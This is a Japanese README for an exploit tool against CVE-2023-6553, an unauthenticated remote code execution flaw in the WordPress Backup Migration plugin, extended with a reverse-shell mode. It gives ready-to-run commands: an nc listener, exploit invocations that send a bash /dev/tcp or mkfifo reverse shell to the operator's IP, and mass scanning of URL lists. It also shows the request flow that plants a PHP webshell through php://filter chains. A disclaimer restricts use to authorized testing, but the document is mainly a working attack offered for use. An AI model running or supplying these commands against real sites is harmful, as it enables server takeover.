
このエクスプロイトはCVE-2023-6553に基づいており、Chocapikによるオリジナルのエクスプロイトを基に構築されました。直接リバースシェルを取得できる機能が追加されています。
元のインタラクティブウェブシェルに加えて、ワンコマンドリバースシェルモードを追加したChocapikkのCVE-2023-6553エクスプロイトの拡張版です。
CVE-2023-6553 — WordPressプラグインBackup Migration(バージョン1.3.7以下)における認証なしリモートコード実行。
このプラグインはbackup-heart.phpを公開しており、Content-Dir HTTPヘッダーからPHPフィルターチェーンを読み取り、認証やサニタイズなしでinclude()に渡します。これにより、認証されていない攻撃者が細工されたphp://filterチェーンを注入して任意のPHPコードを実行できます。
元のエクスプロイトは**Chocapikk**によるものです。すべてのコアな悪用ロジック(フィルターチェーン生成、ファイル書き込み、インタラクティブシェル)は彼の作品です。このリポジトリはリバースシェルトリガーモードを追加したに過ぎません。
唯一の追加点は以下の通りです:
trigger_reverse_shell()メソッド — ウェブシェルが展開された後(オリジナルと同じプロセス)、リバースシェルコマンドを0パラメータとして含む単一のGETリクエストを送信します(インタラクティブシェルとまったく同様)。main()内の5行 — -rが指定された場合にinteractive_shell()をtrigger_reverse_shell()に置き換えます。その他すべて(脆弱性チェック、ファイル書き込みループ、コピー/削除、インタラクティブモード、マルチURLスキャン)はオリジナルから変更されていません。
pip install requests rich alive-progress prompt-toolkit php-filter-chain
# 最初にリスナーを起動
rlwrap nc -lvnp 4444
# エクスプロイトを実行
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444
ターゲットでbash /dev/tcpが利用できない場合は、mkfifoを使用してください(代わりにncに依存します):
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo
python3 exploit.py -u http://TARGET/blog
python3 exploit.py -u http://TARGET/blog -c
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt
-u / --url ターゲットのベースURL(例:http://target/blog)
-r / --revshell リバースシェルモードを有効化
-l / --lhost シェルを受信する自分のIP(-rと併用必須)
-p / --lport リスナーポート(デフォルト: 4444)
--shell シェルタイプ: bash(デフォルト)または mkfifo
-c / --check 脆弱性のみチェックし、シェルを展開しない
-f / --file スキャンするURLのリストが書かれたファイル
-t / --threads マルチURLスキャンのスレッド数(デフォルト: 5)
-o / --output スキャン結果の出力ファイル
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
Content-Dir: php://filter/...<encoded PHP>
→ ウェブシェルを1文字ずつ一時ファイルに書き込む
→ 一時ファイルを<random>.phpにコピー
2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
→ バックティック演算子を使用してコマンドを実行
→ インタラクティブモード: 標準入力からコマンドを読み取りループ
→ リバースシェルモード: bash/mkfifoのワンライナーを送信し、リスナーに接続
3. クリーンアップ: unlink(<random>.php)
このツールは、許可されたペネトレーションテストおよびセキュリティ研究のみを目的としています。テストする明示的な許可がないシステムに対して使用しないでください。
| 機能 | オリジナル(Chocapikk) | このバージョン |
|---|
| インタラクティブウェブシェル | ✅ | ✅(変更なし) |
| リバースシェル | ❌ | ✅(-r) |
| マルチURLスキャン | ✅ | ✅(変更なし) |
| 新しい引数 | — | -r, -l, -p, --shell |